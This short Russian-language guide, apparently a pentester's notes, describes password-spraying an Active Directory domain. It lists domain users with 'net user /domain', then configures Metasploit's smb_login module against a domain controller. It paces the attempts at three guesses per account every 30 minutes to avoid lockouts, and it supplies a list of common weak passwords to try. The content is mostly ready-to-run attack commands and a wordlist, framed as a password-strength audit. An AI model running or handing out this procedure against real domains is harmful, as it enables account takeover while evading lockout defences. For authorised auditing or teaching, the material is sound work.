Для того, чтобы оценить стойкость паролей пользователей домена, можно выполнить простой брут-форс их учетных записей.
Первым делом, вывыедем список всех пользователей:
# net user /domain
Выполняем сохранение этого файла, к примеру users
Переносим файл на Kali и запускаем metasploit:
#msfconsole # use auxiliary/scanner/smb/smb_login # set RHOSTS <IP контроллера домена> # set SMBDomain <Имя домена> # set USER_FILE users # set PASS_FILE passes # set MaxGuessesPerUser 3
Брутить будем по три пароля с перерывом 30 минут, чтобы не залочить учетки.
Пароли, которые стоит проверить:
- Q
- werty12
- Qwerty123
- Qwerty2017
- 1qaz@WSX
- !QAZ2wsx
- 123qweASD
- Pa$$w0rd
- 1q2w#E$R
- <Ваш пароль по умолчанию для юзеров>
- <Название компании>1
- <Название компании>12
- <Название компании>123
- <Название компании>2017
- Jctym2017
- Autumn2017
Сохраняем первую партию паролей в файл passes и запускаем брут:
# run
Когда брут закончится, можно скопировать все из консоли в файлик (допустим, result) и сделать:
# grep + result
Через полчаса загружаем следующую партию паролей в passes, запускаем, ну и так далее, пока не надоест.